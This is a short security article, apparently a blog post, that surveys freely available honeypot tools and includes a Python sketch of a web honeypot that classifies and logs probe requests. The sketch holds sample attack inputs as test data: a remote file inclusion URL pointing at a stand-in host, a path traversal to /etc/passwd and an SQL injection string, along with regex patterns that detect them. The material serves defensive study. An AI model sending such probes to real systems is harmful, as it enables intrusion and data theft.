Specialized Honeypots for SSH, Web and Malware Attacks

A honeypot is a decoy IT infrastructure or application component that is deployed to be attacked. It can take the form of a system, a network or an app, and may be implemented as a real or emulated resource. Since a honeypot has no other purpose, every attempt to interact with it is suspicious.

Honeypots can help discover malicious activities at a lower rate of false positives than traditional intrusion detection approaches. Honeypots can also slow down and mislead the attacker by automatically providing slow responses or incorrect information. Lastly, the logs and artifacts collected by honeypots can be used to learn about the attacker’s capabilities and intentions.

Here are several freely-available honeypot tools specialized for understanding SSH, web and malware attacks:

  • Kippo is an SSH honeypot that can log brute force attacks, in which a remote attacker attempts to guess the logon credentials of an SSH server. Best of all, Kippo is able to record and replay the attacker’s interactions with the emulated shell on the fake SSH server.
  • Glastopf is a web application honeypot. It emulates often-exploited web vulnerabilities, such as remote and local file inclusion and SQL injection. Glastopf examines the attacker’s HTTP request and attempts to respond the way the attacker expects a vulnerable application to, for instance by downloading the malicious file that a remote file inclusion attempt references.
  • Dionaea is a honeypot for collecting malware. It emulates vulnerabilities in Windows services often targeted by malware, such as SMB, HTTP, TFTP and FTP. Dionaea’s handling of the SMB protocol is particularly liked by researchers, as is its ability to emulate the execution of the attacker’s shellcode.
  • Thug is a client-side honeypot (honeyclient) that emulates a web browser. It is designed to automatically interact with the malicious website to explore its exploits and malicious artifacts, often in the form of JavaScript.
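
To make the web-honeypot idea concrete, here is a small added example (not Glastopf’s code, nor any other project’s) that classifies incoming HTTP request lines into the attack classes Glastopf emulates, records every request as a suspicious event, and picks a decoy response that looks like what a vulnerable application would return. The request lines, the hostname `evil.example` and the source address are constructed for the illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Hypothetical patterns for the three probe types the text mentions (RFI, LFI, SQLi).
# Values are URL-decoded by parse_qsl before matching, so encoded quotes are seen too.
RFI = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
LFI = re.compile(r"(?:\.\./|/etc/passwd|/proc/self)", re.IGNORECASE)
SQLI = re.compile(r"'.*(?:--|#|\bor\b|\bunion\b)|\bunion\b.*\bselect\b", re.IGNORECASE)


def classify_request(target):
    """Return the set of attack classes suggested by the request's query parameters."""
    found = set()
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if RFI.search(value):
            found.add("rfi")
        if LFI.search(value):
            found.add("lfi")
        if SQLI.search(value):
            found.add("sqli")
    return found


def honeypot_event(src_ip, request_line):
    """Build the log record. A honeypot serves no legitimate user, so even an
    unclassified request (an empty 'classes' list) is still recorded as suspicious."""
    method, target, _version = request_line.split(" ", 2)
    return {
        "src": src_ip,
        "method": method,
        "target": target,
        "classes": sorted(classify_request(target)),
        "suspicious": True,
    }


def decoy_response(classes):
    """Answer the way the attacker expects a vulnerable app to, so the session
    continues and yields more artifacts. Bodies are decoy content, not real files."""
    if "lfi" in classes:
        return 200, "root:x:0:0:root:/root:/bin/bash\n"
    if "rfi" in classes or "sqli" in classes:
        return 200, "<html><body>OK</body></html>\n"
    return 200, "<html><body>Welcome</body></html>\n"


if __name__ == "__main__":
    # Constructed sample traffic, as a web honeypot might see it.
    for line in ("GET /index.php?page=http://evil.example/shell.txt HTTP/1.1",
                 "GET /index.php?page=../../../../etc/passwd HTTP/1.1",
                 "GET /item.php?id=1%27%20OR%20%271%27=%271 HTTP/1.1",
                 "GET /robots.txt HTTP/1.1"):
        event = honeypot_event("203.0.113.5", line)
        print(event, decoy_response(event["classes"]))
```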

In addition to these honeypot tools, you might also explore Honeywall, Honeyd, and INetSim. Additional malware-focused honeypot tools are Omnivora and Amun. For additional pointers, see Wikipedia articles on Honeypots and Client Honeypots. An excellent book on this topic is Virtual Honeypots: From Botnet Tracking to Intrusion Detection by Niels Provos and Thorsten Holz.


About the Author

Lenny Zeltser develops products and programs that use security to achieve business results. He is the CISO at Axonius and Faculty Fellow at SANS Institute. Lenny has been leading efforts to establish resilient security practices and solve hard security problems for over two decades. A respected author and practitioner, he has been advancing tradecraft and contributing to the community. His insights build upon real-world experience, a Computer Science degree from the University of Pennsylvania, and an MBA degree from MIT Sloan.